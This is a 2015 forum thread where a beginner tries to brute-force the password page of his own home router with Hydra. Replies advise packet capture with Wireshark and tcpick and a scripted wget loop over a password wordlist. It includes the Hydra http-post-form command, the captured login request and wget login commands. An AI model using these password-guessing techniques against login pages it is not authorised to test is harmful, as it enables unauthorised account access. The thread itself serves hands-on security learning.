Rombro Posted September 19, 2015 Share Posted September 19, 2015 Hi I am very new to all this. I am trying to learn how to use Hydra. I've done some reading online and had a go at using it against my own router. I am using Burpsuite to get the POST and response info. My router login page does not have a field for a login only for a password. The default password being "admin". On trying to login to the router using an incorrect password I get the following output: POST /login.cgi HTTP/1.1 Host: 10.1.1.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://10.1.1.1/login_main.html Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 28 login_option=0&password=asdf and the response I get back is: HTTP/1.1 200 Ok Server: micro_httpd Cache-Control: no-cache Date: Sat, 19 Sep 2015 16:27:20 GMT Content-Type: text/html Connection: close <html> <head> <meta HTTP-EQUIV='Pragma' CONTENT='no-cache'> <script language="JavaScript"> function back_page() { var loc = 'login.html'; var code = 'location="' + loc + '"'; eval(code); } </script> </head> <body> <script language="JavaScript"> alert("Invalid password"); back_page(); </script> </body> </html> Given I am just tryint to test out Hydra at the moment and learn it I figured I'd give it the correct login credentials so it only has to make one attempt. My hydra command is as follows: hydra -l 0 -p admin 10.1.1.1 http-post-form "/login_main.html:login_option=^USER^&password=^PASS^:Invalid password" -V However I am getting no joy. It is not able to identify "admin" as the correct password. Any help would be greatly appreciated. Quote Link to comment Share on other sites More sharing options...
cooper Posted September 19, 2015 Share Posted September 19, 2015 Wireshark. Log in using a browser. Follow TCP stream. See what's up. Quote Link to comment Share on other sites More sharing options...
i8igmac Posted September 19, 2015 Share Posted September 19, 2015 (edited) you will have more success scripting your own tool rather then depending on some one else's tools... As cooper said. Open up a packet capture tool and look at the client/server headers... if u can duplicate what u see on the wire with hydra. Test with a single "-u admin -p password" until u see the proper results You can use curl or wget... Edited September 19, 2015 by i8igmac Quote Link to comment Share on other sites More sharing options...
vailixi Posted September 19, 2015 Share Posted September 19, 2015 I was never really sure about brute forcing web logins and what information I was actually looking for. Quote Link to comment Share on other sites More sharing options...
i8igmac Posted September 20, 2015 Share Posted September 20, 2015 (edited) if you send a proper request, you should see a response... if you already have a scripting language of choice. you truly are better off. a tool like Hydra is developed for a broad range of protocolS. any plugins modules or firewalls this server may have installed could potentially cause Hydra to miss... you need to look at the traffic, investigate 2 scenarios... what would a failed response look like? what would a successful response look like? what I have done in the past through a scripting language, sort through your password list processing each line with wget you can then grep threw the output files generated by wget. this is a fun subject. I encourage you to spend the time and experiment on other services as well... you will come across firewall rules that make this subject much more exciting :-) Like a chess game with your eyes closed. Edited September 20, 2015 by i8igmac Quote Link to comment Share on other sites More sharing options...
vailixi Posted September 20, 2015 Share Posted September 20, 2015 So you will know what a false result looks by intercepting the server response with wireshark? So if you get a response other than a failed one it might be a successful login? If it were something like a website where you could create an account you would be able to successfully login and collect the positive login response. So something like: Sorry for shitty pseudo code here. for line in (wordlist.txt); do wget --user=admin --password=line <url> checkfiles() if login !=fail break; print user & password; done Am I close here? Quote Link to comment Share on other sites More sharing options...
Rombro Posted September 20, 2015 Author Share Posted September 20, 2015 if you send a proper request, you should see a response... if you already have a scripting language of choice. you truly are better off. a tool like Hydra is developed for a broad range of protocolS. any plugins modules or firewalls this server may have installed could potentially cause Hydra to miss... you need to look at the traffic, investigate 2 scenarios... what would a failed response look like? what would a successful response look like? what I have done in the past through a scripting language, sort through your password list processing each line with wget you can then grep threw the output files generated by wget. this is a fun subject. I encourage you to spend the time and experiment on other services as well... you will come across firewall rules that make this subject much more exciting :-) Like a chess game with your eyes closed. So I've got the response for both a failed login and a successful login. The failed one is the response in the OP, the successful one is just the router control panel page. And in the case of the hydra command I am feeding it the correct login information (or at least that is what I'm trying to do - not sure if I've got it right thats the problem) so it should work but it still does not identify the password as correct. Given that the response for a fail is in the form of an alert box, how do I script something to parse through the text of an alert box? Or do I not need to do that? I'm a little confused. Quote Link to comment Share on other sites More sharing options...
Rombro Posted September 20, 2015 Author Share Posted September 20, 2015 Appologies for the double post I couldn't find the edit button. Is there one? Ignore the parsing alert box thing I've figured it out. I have managed to build the wget command to log into the site and the compared the output for a successful and unsuccessful login manually. The command is: wget --save-cookies cookies.txt --keep-session-cookies --auth-no-challenge --post-data 'login_option=0&password=nope' http://10.1.1.1/login.cgi The login_option and login.cgi come from burpsuite output as in OP. Now I just need to build a script to automate it - happy days! Thanks for the help so far guys. Quote Link to comment Share on other sites More sharing options...
cooper Posted September 20, 2015 Share Posted September 20, 2015 You get the edit button after a certain amount of posts to the forum. It's anti-spam. Glad to see you got it working. Quote Link to comment Share on other sites More sharing options...
0o0michael0o0 Posted September 20, 2015 Share Posted September 20, 2015 (edited) use burpsuit and check the post data , who knows may be u can inject the post data Edited September 20, 2015 by 0o0michael0o0 Quote Link to comment Share on other sites More sharing options...
i8igmac Posted September 20, 2015 Share Posted September 20, 2015 I should make a tutorial on traffic watching and how to reproduce the stream with tools like curl, wget, netcat and ruby... Apt-get install tcpick This is a tool I use daily, its a lot like tcpdump... a console base traffic sniffer... With 2 consoles run these 2 commands... tcpick -i wlan0 -bPS -C tcpick -i wlan0 -bPC -C Now with your web browser, log into the web page... you will see the traffic in both consoles. One console will show your client request... the other console will show your server response ... You can then press ctrl-c with both console's to kill the application... copy the data you see into a text editor... You can now start both console's back up then run your hydra, wget, curl tests... watch the traffic and identify when you have a proper authentication... Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.